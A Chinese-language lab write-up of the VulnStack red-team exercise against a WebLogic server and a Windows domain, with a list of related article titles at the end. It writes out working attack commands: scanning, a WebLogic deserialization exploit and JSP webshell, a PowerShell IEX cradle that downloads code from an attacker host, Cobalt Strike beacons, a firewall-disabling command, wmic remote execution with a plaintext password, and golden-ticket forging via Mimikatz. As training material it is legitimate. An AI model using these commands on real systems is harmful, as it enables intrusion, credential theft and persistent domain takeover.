靶场下载地址：漏洞详情

环境配置参考：【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园

此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC

第一步：信息收集（模拟黑盒测试）

已知WEB机的IP地址，用syn包进行扫描。

nmap -sS -v 192.168.111.80

获得开放端口

WEB服务器：
Nmap scan report for 192.168.111.80
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn    Samba服务  存在爆破/未授权访问/远程命令执行漏洞
445/tcp   open  microsoft-ds   smb服务  ms17-010/端口溢出漏洞
1433/tcp  open  ms-sql-s  存在mssql服务  存在爆破/注入/SA弱口令
3389/tcp  open  ms-wbt-server  存在远程桌面
7001/tcp  open  afs3-callback    weblogic漏洞
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:68:D3:5F (VMware)

whatWEB扫描

whatweb http://192.168.111.80:7001

得到信息:

http://192.168.111.80:7001 [404 Not Found]Country[RESERVED][ZZ], IP[192.168.111.80],Java[2.1][Servlet/2.5],Title[Error 404--Not Found],
X-Powered-By[Servlet/2.5 JSP/2.1]

观察知道这是一个java开发的WEB，那就扫扫看有没有java类的漏洞

工具地址：GitHub - rabbitmask/WeblogicScan: Weblogic一键漏洞检测工具，V1.5，更新时间：20200730

利用到WeblogicScan来扫描

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

得到漏洞信息：

 [192.168.111.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.111.80:7001] Weblogic console address is exposed! The path is: http://192.168.111.80:7001/console/login/LoginForm.jsp
[+] [192.168.111.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.111.80:7001/uddiexplorer/
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3248
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3506
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[-] [192.168.111.80:7001] weblogic not detected CVE-2019-2890

发现两个java序列化漏洞

扫描WEB目录：

dirb http://192.168.111.80:7001

获得信息

-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sun Apr 10 02:14:41 2022
URL_BASE: http://192.168.111.80:7001/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt--------------------- Scanning URL: http://192.168.111.80:7001/ ----
+ http://192.168.111.80:7001/console (CODE:200|SIZE:416)
==> DIRECTORY: http://192.168.111.80:7001/uddi/
DIRECTORY: http://192.168.111.80:7001/uddiexplorer/                               ---- Entering directory: http://192.168.111.80:7001/uddi/ ----
==> DIRECTORY: http://192.168.111.80:7001/uddi/images/                               ---- Entering directory: http://192.168.111.80:7001/uddi/images/ ---------------------
END_TIME: Sun Apr 10 02:15:21 2022
DOWNLOADED: 13836 - FOUND: 1

都去访问一下就知道，uddi目录是没有权限进入的，但是uddiexplorer可以进入，这里将成为我们大马的安家之地。

第二步  漏洞利用:

使用java 反序列化终极测试工具测试漏洞

Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip - 开发实例、源码下载 - 好例子网

执行命令权限administrator，webshell上传一个jsp大马，利用文件管理寻找前面分析的uddiexplorer这个目录。

上传shell

上传的冰蝎我没成功，无法连接，但是我上传其他的大马。

github有很多，搜索关键词shell就可以找到！

可能是版本问题，java，或者命令行转义问题等。。。

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://172.16.250.3:8022/a')

这条命令的CS利用，我并没有成功。但是我发现file upload是可以用的，于是我决定用beacon.exe来获取shell，上线CS

第三步  上线CS：

CS制作小马

获得一个beacon.exe

利用浏览器的大马上传这个beancon.exe 到 windows/temp/

然后进入cmd执行里执行这句话：

.... 发现CS就上线了

提权：

利用漏洞提权：

jsp大马中
----------------
先输入这条代码：systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt

下面是漏洞对照表:

----------------------------------------
CVE-2017-0213 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
MS17-010 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
MS16-135 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
MS16-098 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
MS16-075 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
MS16-032 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
MS16-016 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
MS15-097 　[KB3089656]　　[remote code execution]　　(win8.1/2012)
MS15-076 　[KB3067505]　　[RPC]　　(2003/2008/7/8/2012)
MS15-077 　[KB3077657]　　[ATM]　　(XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061 　[KB3057839]　　[Kernel Driver]　　(2003/2008/7/8/2012)
MS15-051 　[KB3057191]　　[Windows Kernel Mode Drivers]　　(2003/2008/7/8/2012)
MS15-010 　[KB3036220]　　[Kernel Driver]　　(2003/2008/7/8)
MS15-015 　[KB3031432]　　[Kernel Driver]　　(Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001 　[KB3023266]　　[Kernel Driver]　　(2008/2012/7/8)
MS14-070 　[KB2989935]　　[Kernel Driver]　　(2003)
MS14-068 　[KB3011780]　　[Domain Privilege Escalation]　　(2003/2008/2012/7/8)
MS14-058 　[KB3000061]　　[Win32k.sys]　　(2003/2008/2012/7/8)
MS14-040 　[KB2975684]　　[AFD Driver]　　(2003/2008/2012/7/8)
MS14-002 　[KB2914368]　　[NDProxy]　　(2003/XP)
MS13-053 　[KB2850851]　　[win32k.sys]　　(XP/Vista/2003/2008/win 7)
MS13-046 　[KB2840221]　　[dxgkrnl.sys]　　(Vista/2003/2008/2012/7)
MS13-005 　[KB2778930]　　[Kernel Mode Driver]　　(2003/2008/2012/win7/8)
MS12-042 　[KB2972621]　　[Service Bus]　　(2008/2012/win7)
MS12-020 　[KB2671387]　　[RDP]　　(2003/2008/7/XP)
MS11-080 　[KB2592799]　　[AFD.sys]　　(2003/XP)
MS11-062 　[KB2566454]　　[NDISTAPI]　　(2003/XP)
MS11-046 　[KB2503665]　　[AFD.sys]　　(2003/2008/7/XP)
MS11-011 　[KB2393802]　　[kernel Driver]　　(2003/2008/7/XP/Vista)
MS10-092 　[KB2305420]　　[Task Scheduler]　　(2008/7)
MS10-065 　[KB2267960]　　[FastCGI]　　(IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059 　[KB982799]　　 [ACL-Churraskito]　　(2008/7/Vista)
MS10-048 　[KB2160329]　　[win32k.sys]　　(XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015 　[KB977165]　　 [KiTrap0D]　　(2003/2008/7/XP)
MS09-050 　[KB975517]　　 [Remote Code Execution]　　(2008/Vista)
MS09-020 　[KB970483]　　 [IIS 6.0]　　(IIS 5.1 and 6.0)
MS09-012 　[KB959454]　　 [Chimichurri]　　(Vista/win7/2008/Vista)
MS08-068 　[KB957097]　　 [Remote Code Execution]　　(2000/XP)
MS08-067 　[KB958644]　　 [Remote Code Execution]　　(Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025 　[KB941693]　　 [Win32.sys]　　(XP/2003/2008/Vista)
MS06-040 　[KB921883]　　 [Remote Code Execution]　　(2003/xp/2000)
MS05-039 　[KB899588]　　 [PnP Service]　　(Win 9X/ME/NT/2000/XP/2003)
MS03-026 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)

随便找个漏洞的exp来提权，我这里就跳过上传步骤了，直接到CS上线

Win64.exe是exp

CS下执行找个：

shell C:\Windows\Temp\Win64.exe "C:\Windows\Temp\beacon5.exe"

执行后CS上线

域信息收集

ipconfig /all
查看域名 net config workstation
关闭防火墙  netsh advfirewall set allprofiles state off
查看有几个域  net view /domain
查看域内主机   nei view
查询域内用户   net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员   net group "domain admins" /domain
查看域控    net group "domain controllers" /domain

Portscan

然后在tagert里面psexec上线DC的CS

接下来，讲讲如何利用CS做socks4a 来获取AD机器Cs上线

一样的，上传这个beacon.exe  到AD机上，WEB机上用IPC来vmic命令远程执行

命令如下

 shell wmic /node:10.10.10.10 /user:administrator /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

user可以改成de1ay，改谁就获得谁CS上线的权限

4.2黄金票据利用

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。

黄金票据的条件要求：

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

cs的DUmp hashs  和 Run Mimikatz 获得KRBTGT的hash值和域的SID

Golden Ticket 就是黄金票据。

制作完成后，在tagert上线时候

即使AD机改了管理员密码，你依然可以利用这个票据来获得管理员权限上线AD机

参考：

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园

红日安全内网渗透笔记相关推荐

1. 三层内网渗透笔记-靶场（teamssix.com）

   环境搭建 参考:https://blog.csdn.net/qq_63844103/article/details/126195711 宝塔映射 端口 target 1和target2 开始: tar ...

2. 红日靶场--内网渗透练习

   目录 环境介绍 信息收集 内网主机存活扫描 masscan扫描 ​ Nmap扫描 访问80端口 目录扫描 漏洞利用 探测phpstudy的phpmyadmin目录 ​ 爆破数据库密码 phpmyadm ...

3. 内网渗透笔记——二层发现

   一.OSI七层模型 物理层 数据链路层 网络层 传输层 会话层 表示层 应用层 那所谓二层发现(交换机,mac地址,arp),就是利用数据链路层进行主机的发现 三层--利用ping命令 arping命 ...

4. 内网渗透笔记——msf

   Masscan 号称五分钟扫遍互联网 性能优越,极限速度 1000w/s,参数 跟 nmap 差不多 -p 80,8000-8100 10.0.0.0/24 --max-rate=100000    ...

5. 内网渗透笔记——:)一个笑脸

   打靶机 靶机准备与安装---vulnhub-Metasploitable2-Linux Vulnerable By Design ~ VulnHubVulnHub provides materials ...

6. 内网渗透笔记——三层发现and四层发现

   三层发现(网络层) 最常用ping命令,但是如果防火墙一开,就无法ping到对方.三层发现的优点在于,arping只能发现同一个网段的用户,而三层发现可以发现不同网段但是互联的用户 fping -a ...

7. 内网渗透笔记——注册表自启动与msi提权

   目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini.system.ini.wininit.ini ...

8. 内网渗透|红日安全团队靶场渗透笔记|Mimikatz|MSF跳板

   靶场下载:漏洞详情​​​​​​ 环境搭建: 文件下载下来有三个压缩包,分别对应域中三台主机: VM1对应win7是web服务器 VM2对应windows2003是域成员 VM3对应windows se ...

9. 《内网安全攻防：渗透测试实战指南》读书笔记（一）：内网渗透测试基础

   目录 前言 一.内网基础知识 1.工作组 2.域 3.活动目录 (1)活动目录的功能 (2)DC和AD区别 4.安全域的划分 (1)DMZ (2)内网 5.域中计算机的分类 6.域内权限 (1)组 ( ...

最新文章

1. write up 杂项：telenet
2. ESFramework介绍之（31）―― 消息分类及对应的处理器
3. jquery的2.0.3版本源码系列(2):21行-94行定义了一些变量和函数 jQuery=function(){}
4. 计算机专业英语第07章,计算机专业英语电子教案第07章.ppt
5. 正则表达式 基础认识
6. elixir官方入门教程 递归
7. JAVA提取字符串信息中的数字（包括整数，小数）工具类
8. 如何在mysql命令窗口获取到程序正在执行的sql语句
9. [项目回顾]基于Redis的在线用户列表解决方案
10. 安捷伦or是德信号源+频谱仪操作： 从程控到自动测试 （四）平坦度检测的程控实现
11. “恩智浦”杯智能车竞赛总结
12. 2008 r2安装总是跳出 server sql_关于sql server 2008 r2 安装闪退问题解决办法
13. tampermonkey(油猴)跨域发送请求
14. 硬盘柱面损坏怎么办_最靠谱的机械硬盘坏道修复工具一：DiskGenius
15. 移植Python3到TQ2440（二）
16. 好用到爆的桌面电子教鞭zoomit
17. 四、最小生成树——普里姆（Prim）算法
18. Oracle-SQL-group by-报错：不是单组分组函数
19. MIME Types MIME 类型
20. HTML 中的各种标记简介

热门文章

1. sdram/ddr 功耗计算
2. 《浪潮之巅》笔记之五
3. Fedora35双系统的详细安装教程
4. 《老男孩》网络爆红 非常短片成网剧推手
5. 模拟相机视频输入方案-----模拟转MIPI /DVP方案
6. C#小项目飞翔的小鸟游戏详细教程(Flying bird),基于Winform框架
7. 巧克力html模版,PH配方【巧克力夏洛特chocolate Charlotte】
8. Vue报错：error Extra semicolon semi 已解决
9. 写个人年度总结的必要性
10. python 正则表达式解决包含且不包含某字符串的问题